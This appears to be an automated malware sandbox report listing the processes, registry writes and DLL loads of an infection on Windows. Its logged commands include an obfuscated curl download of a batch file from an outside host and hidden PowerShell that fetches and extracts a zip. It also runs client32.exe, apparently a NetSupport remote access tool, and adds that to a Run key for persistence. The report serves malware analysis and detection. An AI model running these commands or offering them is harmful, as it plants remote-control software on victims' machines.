                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Application.zip', 'C:\Users\user\AppData\Roaming\Options')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Options\client32.exe "C:\Users\user\AppData\Roaming\Options\client32.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:3Jump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=4212 /prefetch:8Jump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,9911073876148280661,11714551439752138496,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=3976 /prefetch:8Jump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST "https://lang3666.top/lv/ddas.php" -o "C:\ProgramData\win.bat" && start /min "" "C:\ProgramData\win.bat" Visitor press EnterJump to behavior
                                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press EnterJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.batJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press EnterJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.batJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.batJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.batJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Application.zip', 'C:\Users\user\AppData\Roaming\Options')"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Options\client32.exe "C:\Users\user\AppData\Roaming\Options\client32.exe" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /fJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: osksupport.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: dwmapi.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: oleacc.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: wmsgapi.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: duser.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: dui70.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: winmmbase.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: mmdevapi.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: ksuser.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: avrt.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: audioses.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: powrprof.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: umpdc.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: msacm32.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: midimap.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: twinapi.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: hid.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: mstextprediction.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: uiautomationcore.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: sxs.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: uiamanager.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: dwrite.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: actxprxy.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: atlthunk.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                                  Source: C:\Windows\explorer.exeSection loaded: osksupport.dllJump to behavior
                                  Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\explorer.exeSection loaded: mlang.dllJump to behavior
                                  Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: osksupport.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: pcicl32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: pcichek.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: pcicapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: dbghelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: dbgcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: nslsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: pcihooks.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: riched32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: pciinv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: firewallapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: fwbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: firewallapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: fwbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: napinsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: pnrpnsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: wshbth.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: nlaapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeSection loaded: winrnr.dllJump to behavior
                                  Source: C:\Windows\System32\osk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{29CE1D46-B481-4AA0-A08A-D3EBC8ACA402}\InProcServer32Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Roaming\Options\NSM.iniJump to behavior
                                  Source: C:\Windows\System32\rundll32.exeWindow found: window name: SysTabControl32Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Options\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Options\msvcr100.dllJump to behavior
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF011000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000022.00000002.1908768239.0000028FCF100000.00000004.00000800.00020000.00000000.sdmp, client32.exe
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 00000022.00000002.1908768239.0000028FCF01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF011000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000022.00000002.1908768239.0000028FCEAD4000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp
                                  Source: Binary string: C:\Program Files (x86)\iTop VPN\vpnclient2.pdb7 source: powershell.exe, 00000022.00000002.1908768239.0000028FCF283000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1908768239.0000028FCF1F9000.00000004.00000800.00020000.00000000.sdmp
